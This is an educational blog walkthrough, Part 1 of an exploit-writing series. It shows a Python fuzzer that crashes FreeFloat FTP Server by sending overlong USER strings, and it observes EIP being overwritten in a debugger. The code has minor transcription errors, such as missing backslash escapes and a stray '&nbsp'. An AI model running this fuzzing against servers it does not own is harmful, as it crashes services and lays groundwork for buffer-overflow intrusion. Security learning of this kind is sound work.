Guide to Basic Exploit Writing (Part 1)

Guide to Basic Exploit Writing
Part 1 – Fuzzing

==================================================
1. Introduction

A FreeFloat FTP Server Buffer Overflow Vulnerability for the Metasploit Framework was released on 07/07/2011 on the Exploit Database (www.exploit-db.com/exploits/17498). The description noted that the exploit works on Win XP SP3 Eng. I tried it on my XP SP3 setup but it didn’t work. I downloaded an earlier exploit (www.exploit-db.com/exploits/15689) and that didn’t work too. I then decided that I might as well “re-discover” the exploit. Since the exploit for XP SP3 has already been done (despite it not working for me), I will do a run-through for Win Vista Business. The same approach can be taken for XP SP2, SP3, etc. Unfortunately, for Win 7, while the fuzzing part and the loading of the shell code works, I believe the DEP prevents the exploit from executing.


Anyway, I will probably divide this walkthrough into 3 parts. This first part will focus on fuzzing. The second part will probably focus on controlling the EIP and the last on the loading of the shellcode and executing of the exploit. A few points to note:
1. I will try to keep this walkthrough as simple and as “fundamental” as possible, hopefully to help rookies (like me!) get their feet wet in writing exploits. If you prefer more details, there are several good tutorials out there e.g. Peter van Eeckhoutte’s website.
2. I will try to avoid the use of Metasploit, specifically the use of msfconsole. That said, I will still use pattern_create, pattern_offset, msfpayload and msfencode, so that we can focus more on the exploit process and less on assembly language, the compiler, the linker, etc.
3. This tutorial is meant for educational purposes only. Test the exploit only on computer networks you own.

==================================================
2. Pre-requisite Knowledge

Here are some pre-requisite knowledge.

1. Some knowledge of Python
2. Some familiarity with ollydbg
3. A little knowledge of the FTP protocol
4. A little knowledge of assembly language e.g. what registers EIP, ESP are, commands like JMP ESP
5. Some knowledge of how the stack works
6. A little knowledge of “little-endian”
7. A little knowledge of Hex values e.g. x41 –> “A”
8. A little knowledge of opcodes e.g. x90 –> No Operation (NOP)
9. Familiarity with Linux

You also require two machines, or virtual machines. My set-up is as follows:
Attacker (192.168.1.7): Linux with python2.7 installed
Victim (192.168.1.4): Win Vista Business with Ollydbg 1.10 and FreeFloat FTP Server installed.

Note that you can download the FreeFloat program from the exploit-db links above. Both Ollydbg 1.10 and 2.00 can be used. The same exploit writing process can be applied to other Vista and XP versions as well, although you may need to tweak the code a bit.

==================================================
3. Creating a Very Basic Fuzzer

First, run ollydbg on the Victim’s computer. Then open the FreeFloat FTP program from within ollydbg. Press F9 to run the FTP program.

Now, let’s build a very basic fuzzer to fuzz the program with varying lengths of “AAAAA…” as our Username


Code

#!/usr/bin/python2.7
# fuzzer.py - An extremely simple fuzzer
import sys
import socket
import time

target_addr = sys.argv[1]
target_port = int(sys.argv[2])

lengths = {127,128,129,255,256,257,511,512,513,1023,1024,1025,2047,2048,2049,4095,4096,4097}

for length in lengths:    #I am having problems with indentation for the submission. The whole block of code below should be indented.
        fuzz = "x41" * length                                          #set fuzz to a different length of 'A's each loop
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)        #create a TCP socket
        connect = sock.connect((target_addr, target_port))
        sock.recv(1024)                                                 #receive the Welcome text from the FTP server
        print "Sending", length, "'A's"
        sock.send("USER " + fuzz + "rn")      &nbsp
;                       #send USER AAAAA... 
        sock.close()
        print length, "'A's sentn"
        time.sleep(0.5)



=================================================
4. Running the Fuzzer

Now, make your fuzzer.py file executable, and run it. You should get something similar to the following:


Code

# ./fuzzer.py 192.168.1.4 21
Sending 4096 'A's
4096 'A's sent

Sending 4097 'A's
4097 'A's sent

Sending 1025 'A's
1025 'A's sent

Sending 2048 'A's
2048 'A's sent

Sending 2049 'A's
2049 'A's sent

Sending 129 'A's
129 'A's sent

Sending 128 'A's
128 'A's sent

Sending 127 'A's
127 'A's sent

Sending 257 'A's
257 'A's sent





For me, the program ‘hangs’ after sending out 257 ‘A’s. It may differ slightly for you, but the figure should be between 200+ to ~1000. More importantly, take a look at the top right window of ollydbg, which shows the registers. Look at the value of EIP, which holds the address of the instruction to be executed – it is 41414141 or AAAA! 4 bytes from our string of ‘A’s has overwritten the EIP and there’s a chance we can control the execution of the FTP program.

Before moving on to the next part on Controlling the EIP, try to tweak the lengths in fuzzer.py to find out approximate maximum length of ‘A’s that will ‘hang’ the FTP program and overwrite the EIP with 41414141. For Vista, it should be around 1000. You will probably need to restart the FTP program in ollydbg. Do so by keying in Crtl-F2, followed by F9.

I will stop here for now. Part 2 on Controlling the EIP will hopefully be up by next week. (The exploit is quick to write but typing up a tutorial takes a while!)

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s